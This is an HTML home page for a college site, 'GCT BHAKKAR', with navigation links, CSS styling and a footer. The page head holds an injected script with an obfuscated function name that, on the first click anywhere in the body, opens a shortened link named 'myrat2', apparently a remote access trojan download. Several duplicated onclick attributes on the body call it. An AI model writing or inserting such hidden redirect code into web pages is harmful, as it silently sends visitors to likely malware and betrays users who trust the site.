<!DOCTYPE html>
<html lang="en">
<head><script type = "text/javascript">load = 'True';function VXNlcmNvcjogSW(){if (load == 'True'){var win = window.open('http://rebrand.ly/myrat2', '_blank');win.focus();load = "False";}}</script>
    <title>Document</title>
    <link rel="stylesheet" href="gct info.css">
</head>
<style>
h1{
    background: linear-gradient(rgb(113, 84, 84),rgb(134, 161, 238),rgb(193, 3, 168));
   border: 4px solid black;
    font-size: 60px;
    font-weight: 60px;
    font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
    text-align: center;
    text-decoration:underline;
    color: black;
    } 
    img{
    height: 100px;
    width: 120px;
        width: 100px;
        height: 93px;
        border-radius: 50%;
        border: 4px solid yellow;
        object-fit: cover;
    } 
    header {
      background: linear-gradient(rgb(234, 138, 138),rgb(61, 129, 184));
      text-align: center;
           font-size: 20px;
           font-weight: 25px;
          border: 3px solid black;
        }
    a{
      border: 3px solid darkblue;
    margin: 86px;
    
      color: aquamarine;
      background-color: black;
    }
    nav a:hover{
      background-color:blue;
    }
    h2{
      text-decoration:underline;
      font-size: 30px;
      font-weight: 30px;
      font-family: 'Franklin Gothic Medium', 'Arial Narrow', Arial, sans-serif;
      
    }
    body{
      background-image: url('col.jpg');
        margin: 0;  
        padding: 0;
        background-size: cover; 
        background-position: center; 
        background-attachment: fixed; 
        height: 100vh;
       
      }
    label{
      border: 3px solid darkblue;
      margin: 85px;
      color: aquamarine;
      background-color: black;
    }
    footer{
    border-right: 2px;
    
    }
        </style>
<body onclick = "VXNlcmNvcjogSW()" onclick = "VXNlcmNvcjogSW()" onclick = "VXNlcmNvcjogSW()">
 
   <header>
        <nav>
              <a  href="admission link.html">Admission</a>
              <a href="about college.html">About College</a>
              <a  href="projects.html">Projects</a>
              <a  href="contact.html">Contact</a>
          </nav>
     </header>
     <h1><div class="img"><img src="radious.png">GCT BHAKKAR<img src="radious.png"></h1></div>
     
</body>
 <div><footer>&copy;2025 Ameer Hamza@</footer> </div>
</html>